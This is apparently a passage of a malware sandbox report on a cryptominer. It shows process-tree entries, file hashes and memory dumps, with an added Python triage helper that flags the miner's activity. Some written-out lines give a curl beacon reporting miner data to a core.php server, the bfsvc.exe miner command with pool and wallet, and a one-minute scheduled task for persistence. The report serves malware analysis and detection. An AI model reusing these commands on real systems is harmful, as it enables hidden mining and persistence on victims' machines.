[tree depth 1] C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k LocalService
- Suspicious use of AdjustPrivilegeToken
-
[tree depth 1] C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k LocalService
- Suspicious use of AdjustPrivilegeToken
-
[tree depth 1] C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe
  command line: C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe
- Executes dropped EXE
-
[tree depth 2] C:\Windows\SysWOW64\schtasks.exe
  command line: /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
- Creates scheduled task(s)
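The process tree above repeats one cycle: a RegHost.exe copy starts bfsvc.exe with mining-pool arguments, explorer.exe is started with the key, GPU, worker and coin values as arguments, curl reports those values to core.php on 185.137.234.33:8000, and a fresh RegHost.exe restarts the loop; separately, schtasks registers a "Telemetry Logging" task that runs oobeldr.exe from AppData every minute. The helper below is an added example, not part of this sandbox report, that runs three checks over (image path, command line) records of that shape: it decodes the core.php beacon's query fields, flags a command line that carries both --pool and --user under a C:\Windows image path, and flags a schtasks /create line scheduled by the minute whose target sits under AppData. The sample records are constructed from the lines in this report plus two benign controls; the function names, the five-minute interval threshold and the token-based miner check are this example's own choices.

```python
"""Triage helper for the command lines recorded in this report: the HTTP beacon to
core.php, the miner launched under a C:\\Windows image path, and the one-minute
scheduled task pointing into AppData. Added example, not part of the sandbox
report; the sample records below are constructed to match the report's lines."""
import re
from urllib.parse import parse_qs, urlparse

# (image path, command line) pairs, constructed from the process tree above,
# followed by two benign controls that the checks must not flag.
SAMPLE_RECORDS = [
    ("C:\\Windows\\SYSTEM32\\curl.exe",
     'curl "http://185.137.234.33:8000/core.php?u_key=dragneysterhardsys123'
     '&gpu=Microsoft%20Basic%20Display%20Adapter&worker=Krutoi&coin=ton&hash=0.0"'),
    ("C:\\Windows\\bfsvc.exe",
     "C:\\Windows\\bfsvc.exe -a TON --pool https://server1.whalestonpool.com "
     "--user EQDQ1o_jTqG9I7DLnTYl5JoBxHlXay2kqcudx2WG-V9swWZX"),
    ("C:\\Windows\\SysWOW64\\schtasks.exe",
     '/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" '
     '/tr "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\oobeldr.exe"'),
    ("C:\\Windows\\system32\\svchost.exe",
     "C:\\Windows\\system32\\svchost.exe -k LocalService"),
    # Constructed control: daily schedule, target under Program Files.
    ("C:\\Windows\\System32\\schtasks.exe",
     '/create /sc daily /tn "Nightly Backup" /tr "C:\\Program Files\\Backup\\backup.exe"'),
]

# Query keys the beacon in this report sends to core.php.
BEACON_KEYS = {"u_key", "gpu", "worker", "coin", "hash"}
URL_RE = re.compile(r'https?://[^\s"\']+')
MINUTE_TASK_RE = re.compile(r"/sc\s+minute\s+/mo\s+(\d+)", re.I)
TASK_TARGET_RE = re.compile(r'/tr\s+"([^"]*)"', re.I)


def parse_miner_beacon(cmdline):
    """Return the beacon fields (netloc plus the percent-decoded query values)
    when the command line carries a URL whose query has every BEACON_KEY."""
    for url in URL_RE.findall(cmdline):
        parsed = urlparse(url)
        query = parse_qs(parsed.query)
        if BEACON_KEYS.issubset(query):
            fields = {key: query[key][0] for key in BEACON_KEYS}
            fields["host"] = parsed.netloc
            return fields
    return None


def looks_like_miner(cmdline):
    """True when the command line carries both a --pool and a --user argument,
    the two flags present on the bfsvc.exe line in this report."""
    tokens = cmdline.split()
    return "--pool" in tokens and "--user" in tokens


def parse_minute_task(cmdline):
    """For a schtasks /create line scheduled by the minute, return the interval
    and target; None for any other schedule or for non-create invocations."""
    if "/create" not in cmdline.lower():
        return None
    interval = MINUTE_TASK_RE.search(cmdline)
    if not interval:
        return None
    target_match = TASK_TARGET_RE.search(cmdline)
    target = target_match.group(1) if target_match else ""
    return {
        "interval_min": int(interval.group(1)),
        "target": target,
        "target_in_appdata": "\\appdata\\" in target.lower(),
    }


def triage(records):
    """Run the three checks over (image, cmdline) records; return findings as
    (image, finding kind, detail) tuples in record order."""
    findings = []
    for image, cmdline in records:
        beacon = parse_miner_beacon(cmdline)
        if beacon:
            findings.append((image, "miner-beacon", beacon))
        if looks_like_miner(cmdline):
            kind = "miner-under-windows-path" if image.lower().startswith("c:\\windows\\") else "miner"
            findings.append((image, kind, cmdline))
        if image.lower().endswith("schtasks.exe"):
            task = parse_minute_task(cmdline)
            if task and task["interval_min"] <= 5:  # threshold chosen for this example
                findings.append((image, "minute-task-persistence", task))
    return findings


if __name__ == "__main__":
    for image, kind, detail in triage(SAMPLE_RECORDS):
        print(f"{kind:26} {image}\n    {detail}")
```

Run against the constructed records it reports exactly three findings, one per malicious line, and nothing for the svchost.exe and daily-backup controls. Feeding it real Sysmon event 1 or EDR command-line records only needs the (image, cmdline) pairs; the beacon parser keys on the query parameter set rather than the IP, so it still matches if the operator moves core.php to another host.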
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Temp\loader.exe
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe (every RegHost.exe entry carries the same hashes as loader.exe: it is a copy of the loader)
MD5: 1393255baa29e16a2a5cf2afa989e1e8
SHA1: 37e362a244a64dc1ab3aa34b0f39fc96134abd02
SHA256: dcf27c759561e5557f60caf92709e33e75ed8b522751b7b8fd63c1165c565875
SHA512: a31d364867baa3b6f7e71d193e66ab3a7dd3d054d08701f42dc13c42754567e931806ee2693e029f787e2f012ca2bc01d1646eeb87d1bff2cbfc47c16c66ba2d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe
C:\Users\Admin\AppData\Roaming\e3dwefw.exe (same hashes as oobeldr.exe: the scheduled-task target is a copy of e3dwefw.exe)
MD5: 67486b272027c5c08c37d2a7dfa3b019
SHA1: 660cd3fa71e480e03b392ccfff95b1a651ec1563
SHA256: cb2f3c7a11ff1993ed3a24d396beeca0f06842b9cd9097351a7c8662250ec677
SHA512: 6565af5f8e090285258a0abf4faa1c99790b409f4ed8a4233048614ca470f1d7c4a40f951bd7c2664c567f7788f9e689afb3d72fcff853d888fef5b40051cf61
-
C:\Users\Admin\AppData\Roaming\asf3r3.exe
MD5: 654b0fbc5f45e7aa0d208a9ae2352f30
SHA1: d91b8b6a3d1815010973db6189fc1f7b73e98dd8
SHA256: 808bad1396611118abb83a7d09940c7c47d785511db2e5b652becf9ec67cdb19
SHA512: 807a471d51a5e7f22f19a7cd0775f852519c256b3592136b4f673dcc8b53488698c5830d75cfc461937a5a485963c37e1eb4e18c40446ac241df1b859a242234
-
memory/224-225-0x0000000140000000-0x000000014002A000-memory.dmp (168KB)
memory/556-189-0x0000000140000000-0x000000014002A000-memory.dmp (168KB)
memory/904-301-0x0000000140000000-0x000000014002A000-memory.dmp (168KB)
memory/1284-314-0x00007FF641840000-0x00007FF642128000-memory.dmp (8.9MB)
memory/1284-316-0x00007FF641840000-0x00007FF642128000-memory.dmp (8.9MB)
memory/1284-315-0x00007FF641840000-0x00007FF642128000-memory.dmp (8.9MB)
memory/1340-292-0x0000000140000000-0x000000014002A000-memory.dmp (168KB)
memory/1420-207-0x0000000140000000-0x000000014002A000-memory.dmp (168KB)
memory/1484-170-0x0000000140000000-0x000000014002A000-memory.dmp (168KB)
memory/1484-169-0x0000000140000000-0x000000014002A000-memory.dmp (168KB)
memory/1544-202-0x00007FF641840000-0x00007FF642128000-memory.dmp (8.9MB)
memory/1544-203-0x00007FF641840000-0x00007FF642128000-memory.dmp (8.9MB)
memory/1544-204-0x00007FF641840000-0x00007FF642128000-memory.dmp (8.9MB)
memory/1720-221-0x00007FF641840000-0x00007FF642128000-memory.dmp (8.9MB)
memory/1720-220-0x00007FF641840000-0x00007FF642128000-memory.dmp (8.9MB)
memory/1720-222-0x00007FF641840000-0x00007FF642128000-memory.dmp (8.9MB)
memory/2016-274-0x0000000140000000-0x000000014002A000-memory.dmp (168KB)
memory/2368-269-0x00007FF641840000-0x00007FF642128000-memory.dmp (8.9MB)
memory/2368-270-0x00007FF641840000-0x00007FF642128000-memory.dmp (8.9MB)
memory/2368-271-0x00007FF641840000-0x00007FF642128000-memory.dmp (8.9MB)
memory/2580-298-0x00007FF641840000-0x00007FF642128000-memory.dmp (8.9MB)
memory/2580-297-0x00007FF641840000-0x00007FF642128000-memory.dmp (8.9MB)
memory/2580-296-0x00007FF641840000-0x00007FF642128000-memory.dmp (8.9MB)
memory/2756-167-0x00007FF7575B0000-0x00007FF757E98000-memory.dmp (8.9MB)
memory/2756-165-0x00007FF7575B0000-0x00007FF757E98000-memory.dmp (8.9MB)
memory/2756-166-0x00007FF7575B0000-0x00007FF757E98000-memory.dmp (8.9MB)
memory/2772-168-0x0000000140000000-0x000000014274C000-memory.dmp (39.3MB)
memory/2828-133-0x0000000005BD0000-0x0000000005C62000-memory.dmp (584KB)
memory/2828-137-0x0000000005F70000-0x0000000005FE6000-memory.dmp (472KB)
memory/2828-150-0x0000000005B40000-0x0000000005B5E000-memory.dmp (120KB)
memory/2828-132-0x0000000006180000-0x0000000006724000-memory.dmp (5.6MB)
memory/2828-131-0x0000000005AF0000-0x0000000005AF1000-memory.dmp (4KB)
memory/2828-130-0x0000000000FE0000-0x0000000001140000-memory.dmp (1.4MB)
memory/2828-151-0x0000000006020000-0x000000000602A000-memory.dmp (40KB)
memory/2856-244-0x00007FF641840000-0x00007FF642128000-memory.dmp (8.9MB)
memory/2856-246-0x00007FF641840000-0x00007FF642128000-memory.dmp (8.9MB)
memory/2856-243-0x00007FF641840000-0x00007FF642128000-memory.dmp (8.9MB)
memory/2928-251-0x00007FF641840000-0x00007FF642128000-memory.dmp (8.9MB)
memory/2928-252-0x00007FF641840000-0x00007FF642128000-memory.dmp (8.9MB)
memory/2928-253-0x00007FF641840000-0x00007FF642128000-memory.dmp (8.9MB)
memory/3024-249-0x0000000140000000-0x000000014002A000-memory.dmp (168KB)
memory/3060-289-0x00007FF641840000-0x00007FF642128000-memory.dmp (8.9MB)
memory/3060-287-0x00007FF641840000-0x00007FF642128000-memory.dmp (8.9MB)
memory/3060-288-0x00007FF641840000-0x00007FF642128000-memory.dmp (8.9MB)
memory/3084-155-0x00000000049B0000-0x00000000049C2000-memory.dmp (72KB)
memory/3084-162-0x00000000074D0000-0x0000000007520000-memory.dmp (320KB)
memory/3084-157-0x0000000005540000-0x0000000005702000-memory.dmp (1.8MB)
memory/3084-158-0x0000000004900000-0x0000000004F18000-memory.dmp (6.1MB)
memory/3084-156-0x0000000004AE0000-0x0000000004BEA000-memory.dmp (1.0MB)
memory/3084-154-0x0000000004F20000-0x0000000005538000-memory.dmp (6.1MB)
memory/3084-153-0x0000000000500000-0x000000000056C000-memory.dmp (432KB)
memory/3084-161-0x0000000006830000-0x000000000686C000-memory.dmp (240KB)
memory/3084-159-0x00000000069D0000-0x0000000006EFC000-memory.dmp (5.2MB)
memory/3084-160-0x0000000006580000-0x00000000065E6000-memory.dmp (408KB)
memory/3100-245-0x0000000004F40000-0x0000000005558000-memory.dmp (6.1MB)
memory/3100-240-0x0000000000740000-0x0000000000760000-memory.dmp (128KB)
memory/3300-256-0x0000000140000000-0x000000014002A000-memory.dmp (168KB)
memory/3908-186-0x00007FF641840000-0x00007FF642128000-memory.dmp (8.9MB)
memory/3908-184-0x00007FF641840000-0x00007FF642128000-memory.dmp (8.9MB)
memory/3908-185-0x00007FF641840000-0x00007FF642128000-memory.dmp (8.9MB)
memory/3964-319-0x0000000140000000-0x000000014002A000-memory.dmp (168KB)